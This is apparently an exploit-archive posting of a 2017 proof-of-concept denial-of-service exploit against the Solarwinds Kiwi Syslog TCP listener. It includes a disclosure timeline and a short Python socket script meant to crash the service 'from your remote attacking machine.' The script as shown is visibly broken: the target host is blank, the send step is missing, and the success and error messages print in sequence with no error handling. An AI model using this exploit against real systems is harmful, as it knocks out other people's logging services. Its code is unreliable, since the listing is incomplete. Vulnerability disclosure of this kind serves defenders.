Solarwinds Kiwi Syslog Denial Of Service

Solarwinds Kiwi Syslog version suffers from a denial of service vulnerability.

MD5 | 0278ecdc30a2acf548d2d504ee692ad3

# Exploit Title: Solarwinds Kiwi Syslog - Remote Denial of Service (Type Mismatch)
# Date: 26/05/2017
# Exploit Author: Guillaume Kaddouch
# Twitter: @gkweb76
# Blog:
# GitHub:
# Vendor Homepage:
# Software Link:
# Version:
# Tested on: Windows 7 SP1 Family x64 (FR) and Windows 8.1 Pro x64
# Category: DoS

Disclosure Timeline:
2017-05-20: Vulnerability discovered
2017-05-26: Vendor contacted
2017-05-31: Vendor answered (technical support)
2017-05-31: Vendor contacted (no answer)
2017-08-01: Exploit published

Description :
A remote Denial of Service exists in Kiwi Syslog in the TCP listener.
Apparently any data sent to it make it crash because of a Type Mismatch error.
The syslog TCP listener is disabled by default.

- Starts Kiwi Syslog, and enable the TCP listener in the settings, default port is 1468.
- Run this exploit locally or from your remote attacking machine.

import socket

host = ""
port = 1468

buffer = "crash please?"

print "[*] Connecting to %s:%d" % (host, port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

print "[*] Sending buffer... (%d bytes)" % len(buffer)

print "[*] Done."
print "[-] Error connecting"

Related Posts